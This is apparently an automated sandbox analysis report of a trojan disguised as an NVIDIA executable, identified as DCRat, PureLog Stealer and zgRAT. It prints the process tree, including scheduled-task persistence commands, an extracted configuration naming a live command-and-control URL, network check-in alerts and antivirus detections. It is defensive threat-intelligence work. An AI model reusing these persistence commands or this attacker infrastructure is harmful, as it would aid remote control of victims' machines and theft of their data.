Edit tour

Windows Analysis Report
NVIDIAShare.exe.bin.exe

Overview

General Information

Sample name:	NVIDIAShare.exe.bin.exe
Analysis ID:	1590022
MD5:	c9feda13f449c852ee9b95967bdfd3de
SHA1:	015bf16040a779d85521d5296b6ed27d1e761e70
SHA256:	ea0dec7cb08637c829b8c4d08439524e9c1ad5a7116e6cfd8780b533809bff72
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Creates processes via WMI

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: WScript or CScript Dropper

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

NVIDIAShare.exe.bin.exe (PID: 2788 cmdline: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe" MD5: C9FEDA13F449C852EE9B95967BDFD3DE)

wscript.exe (PID: 5480 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\NVIDIA\RbwXTgCxu.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

NVIDIA Container.exe (PID: 1472 cmdline: "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

schtasks.exe (PID: 5856 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3356 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZ" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3220 cmdline: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 4324 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5908 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 768 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2284 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2520 cmdline: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 6176 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 4092 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5032 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 6512 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 2568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5536 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 1196 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 2876 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 6020 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 5528 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5160 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 5340 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 6352 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7056 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 2964 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 5296 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 5036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2672 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 5560 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 1684 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 2788 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 1436 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 4820 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 4708 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 356 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 4592 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 3292 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 2656 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 6628 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 6044 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 1788 cmdline: "C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe" MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cmd.exe (PID: 2964 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 3348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 1732 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 1248 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

Conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

hBoBqOIwjXsCbkOMEKwZ.exe (PID: 3720 cmdline: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe MD5: 833E95D4CE4E4A4AD42322F75AE6FF57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
NVIDIAShare.exe.bin.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
NVIDIAShare.exe.bin.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2039608649.000000000715A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000005.00000000.2079077521.0000000000E72000.00000002.00000001.01000000.0000000A.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.2039037903.000000000684E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: NVIDIA Container.exe PID: 1472	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: hBoBqOIwjXsCbkOMEKwZ.exe PID: 2520	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
5.0.NVIDIA Container.exe.e70000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
5.0.NVIDIA Container.exe.e70000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NVIDIAShare.exe.bin.exe.68642e1.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NVIDIAShare.exe.bin.exe.71702e1.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NVIDIAShare.exe.bin.exe.71702e1.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.NVIDIAShare.exe.bin.exe.68642e1.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe, ParentProcessId: 2788, ParentProcessName: NVIDIAShare.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , ProcessId: 5480, ProcessName: wscript.exe

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\NVIDIA/NVIDIA Container.exe", ParentImage: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe, ParentProcessId: 1472, ParentProcessName: NVIDIA Container.exe, ProcessCommandLine: schtasks.exe /create /tn "hBoBqOIwjXsCbkOMEKwZh" /sc MINUTE /mo 6 /tr "'C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe'" /f, ProcessId: 5856, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe", ParentImage: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe, ParentProcessId: 2788, ParentProcessName: NVIDIAShare.exe.bin.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe" , ProcessId: 5480, ProcessName: wscript.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:37:13.005589+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49704	104.21.64.1	80	TCP
2025-01-13T13:37:24.896291+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49745	104.21.64.1	80	TCP
2025-01-13T13:37:32.865040+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49796	104.21.64.1	80	TCP
2025-01-13T13:37:44.818204+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49872	104.21.64.1	80	TCP
2025-01-13T13:37:52.443231+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49919	104.21.64.1	80	TCP
2025-01-13T13:38:05.240142+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49980	104.21.64.1	80	TCP
2025-01-13T13:38:13.349540+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49981	104.21.64.1	80	TCP
2025-01-13T13:38:21.365330+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49982	104.21.64.1	80	TCP
2025-01-13T13:38:33.693350+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49983	104.21.64.1	80	TCP
2025-01-13T13:38:40.990270+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49984	104.21.64.1	80	TCP
2025-01-13T13:38:52.193443+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49985	104.21.64.1	80	TCP
2025-01-13T13:39:03.101484+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49986	104.21.64.1	80	TCP
2025-01-13T13:39:09.880948+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49987	104.21.64.1	80	TCP
2025-01-13T13:39:21.068494+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49988	104.21.64.1	80	TCP
2025-01-13T13:39:31.990406+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49989	104.21.64.1	80	TCP
2025-01-13T13:39:54.443563+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49991	104.21.64.1	80	TCP
2025-01-13T13:40:05.537339+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49992	104.21.64.1	80	TCP
2025-01-13T13:40:12.349847+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49993	104.21.64.1	80	TCP
2025-01-13T13:40:23.318637+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49994	104.21.64.1	80	TCP
2025-01-13T13:40:34.318680+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49995	104.21.64.1	80	TCP
2025-01-13T13:40:45.506195+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49996	104.21.64.1	80	TCP
2025-01-13T13:40:56.849991+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49997	104.21.64.1	80	TCP
2025-01-13T13:41:07.849998+0100	2048095	1	A Network Trojan was detected	192.168.2.5	49998	104.21.64.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: NVIDIAShare.exe.bin.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\IyVKJmYP.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\DnVLkBOS.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\AOEnQqnj.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\DSPMVDWa.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\NVIDIA\WRqwjVLhswP6l4C4Fp0FJhl.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\Desktop\CTevJfQr.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\JOqdsLLu.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\1LArpmQ7xZ.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\JfykNhTG.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\vPPPhWVNfR.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\JesvDTTS.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb

Found malware configuration

Source: 00000005.00000002.2118287388.000000001369A000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: DCRat {"C2 url": "http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\AAjFTaDk.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\AOEnQqnj.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\AVNUZtIi.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\BlhnJSvN.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\CTevJfQr.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DSPMVDWa.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\DaiMBcDs.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\DnVLkBOS.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\GwjbnDUU.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\HbFMikPW.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\IMSbQhuH.log	ReversingLabs: Detection: 37%
Source: C:\Users\user\Desktop\IyVKJmYP.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\JOqdsLLu.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\JesvDTTS.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\JfykNhTG.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\LxmktYfY.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\NBjcEgcI.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\OOMCloya.log	ReversingLabs: Detection: 50%
